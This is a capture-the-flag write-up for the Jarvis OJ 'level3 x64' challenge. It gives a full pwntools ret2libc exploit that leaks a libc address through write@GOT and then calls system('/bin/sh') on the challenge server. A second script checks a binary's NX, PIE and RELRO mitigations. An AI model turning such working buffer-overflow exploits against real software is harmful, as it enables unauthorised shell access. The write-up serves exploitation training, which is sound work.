[XMAN]level3(x64)

nc pwn2.jarvisoj.com 9883

Hint1: The attachment for this challenge has been updated; please download it again so that it does not affect your solve.

level3_x64.rar.9169aec8b6cb4bfc3a0f5c50a7519004

64-bit ret2libc

The exploit is as follows:

from pwn import *

#io = process('./level3_x64')
io = remote('pwn2.jarvisoj.com', 9883)
elf = ELF('./level3_x64')
#libc = elf.libc
libc = ELF('./libc-2.19.so')   # libc shipped with the challenge

# Addresses in the main binary are fixed (non-PIE), so they can be hard-coded.
pop_rdi = 0x4006b3             # pop rdi ; ret
pop_rsi_r15 = 0x4006b1         # pop rsi ; pop r15 ; ret
write_plt = 0x4004B0
write_got = 0x600A58
vuln_addr = 0x4005E6           # return into the vulnerable function for a second input

# Stage 1: 136 bytes of padding reach the saved return address, then call
# write(1, write_got, rdx) to leak the address of write in libc
# (rdx is not set by the chain; it keeps whatever value it had).
payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got)
payload += p64(0) + p64(write_plt) + p64(vuln_addr)   # p64(0) is the junk value popped into r15
io.recvuntil(b'Input:\n')
io.send(payload)
write_addr = u64(io.recv(8))
info("write_addr: " + hex(write_addr))

# Stage 2: derive the libc base from the leak and resolve system / "/bin/sh"
libc_base = write_addr - libc.symbols['write']
info("libc_base: " + hex(libc_base))
system_addr = libc.symbols['system'] + libc_base
info("system_addr: " + hex(system_addr))
binsh_addr = next(libc.search(b'/bin/sh')) + libc_base
info("binsh_addr: " + hex(binsh_addr))

# Stage 3: system("/bin/sh")
payload = b'a' * 136 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
io.recvuntil(b'Input:\n')
io.send(payload)

io.interactive()
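The script above only works because the binary ships without the usual mitigations: the gadget, PLT and GOT addresses are hard-coded (no PIE), and the chain returns into libc instead of injected code (NX stack). The check below is an added example, not part of the original writeup or of the challenge files: it reads the ELF64 program headers and dynamic section directly, without pwntools, and reports NX, PIE and RELRO in the same terms checksec uses. The sample image it parses is constructed in `build_sample_elf` for offline testing and mimics the layout implied by the exploit (non-PIE, NX, partial RELRO); pass a path on the command line to run it against a real binary instead.

```python
import struct
import sys

# ELF constants (ELF64 specification / glibc elf.h)
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC = 2
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X = 0x1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def elf_mitigations(data: bytes) -> dict:
    """Report NX / PIE / RELRO for a little-endian ELF64 image held in memory."""
    if data[:4] != b'\x7fELF':
        raise ValueError('not an ELF file')
    if data[4] != 2 or data[5] != 1:
        raise ValueError('only little-endian ELF64 is handled here')
    e_type = struct.unpack_from('<H', data, 16)[0]
    e_phoff = struct.unpack_from('<Q', data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 54)

    nx = False          # checksec convention: no PT_GNU_STACK counts as NX disabled
    has_relro = False
    bind_now = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags, p_offset, _vaddr, _paddr, p_filesz = struct.unpack_from('<IIQQQQ', data, off)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)            # stack is non-executable unless PF_X is set
        elif p_type == PT_GNU_RELRO:
            has_relro = True                     # GOT region is remapped read-only after relocation
        elif p_type == PT_DYNAMIC:
            # Full RELRO additionally needs eager binding so the whole GOT can be locked
            for ent in range(p_offset, p_offset + p_filesz, 16):
                d_tag, d_val = struct.unpack_from('<qQ', data, ent)
                if d_tag == DT_NULL:
                    break
                if d_tag == DT_BIND_NOW or \
                   (d_tag == DT_FLAGS and d_val & DF_BIND_NOW) or \
                   (d_tag == DT_FLAGS_1 and d_val & DF_1_NOW):
                    bind_now = True

    relro = 'full' if has_relro and bind_now else 'partial' if has_relro else 'none'
    # ET_DYN means position-independent; an ET_EXEC image is loaded at its fixed link address
    return {'nx': nx, 'pie': e_type == ET_DYN, 'relro': relro}


def build_sample_elf(pie: bool, nx: bool, relro: str) -> bytes:
    """Constructed minimal ELF64 image for testing; headers only, no code."""
    phdrs = [(PT_GNU_STACK, 0x6 if nx else 0x7, 0, 0, 0, 0, 0, 16)]
    dyn = b''
    if relro != 'none':
        phdrs.append((PT_GNU_RELRO, 0x4, 0, 0, 0, 0, 0, 1))
    if relro == 'full':
        dyn += struct.pack('<qQ', DT_FLAGS, DF_BIND_NOW)
    dyn += struct.pack('<qQ', DT_NULL, 0)
    dyn_off = 64 + 56 * (len(phdrs) + 1)       # dynamic section follows the program headers
    phdrs.append((PT_DYNAMIC, 0x6, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 8))
    ehdr = b'\x7fELF' + bytes([2, 1, 1, 0]) + b'\x00' * 8
    ehdr += struct.pack('<HHIQQQIHHHHHH', ET_DYN if pie else ET_EXEC, 62, 1, 0, 64, 0, 0,
                        64, 56, len(phdrs), 64, 0, 0)
    return ehdr + b''.join(struct.pack('<IIQQQQQQ', *p) for p in phdrs) + dyn


if __name__ == '__main__':
    if len(sys.argv) > 1:
        with open(sys.argv[1], 'rb') as f:
            image = f.read()
    else:
        # Constructed stand-in for what the hard-coded addresses in the exploit imply
        image = build_sample_elf(pie=False, nx=True, relro='partial')
    for name, value in elf_mitigations(image).items():
        print(f'{name:6} {value}')
```

Each reported field maps to one assumption of the script: PIE would randomise the gadget and GOT addresses, Full RELRO would lock the GOT (it stays readable, so the leak itself survives, but it closes GOT-overwrite variants), and NX is why the payload chains into libc rather than onto the stack. The canary is not covered here because detecting it needs symbol-table parsing rather than program headers.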

Posted @ 2021-07-17 17:11 by hktk1643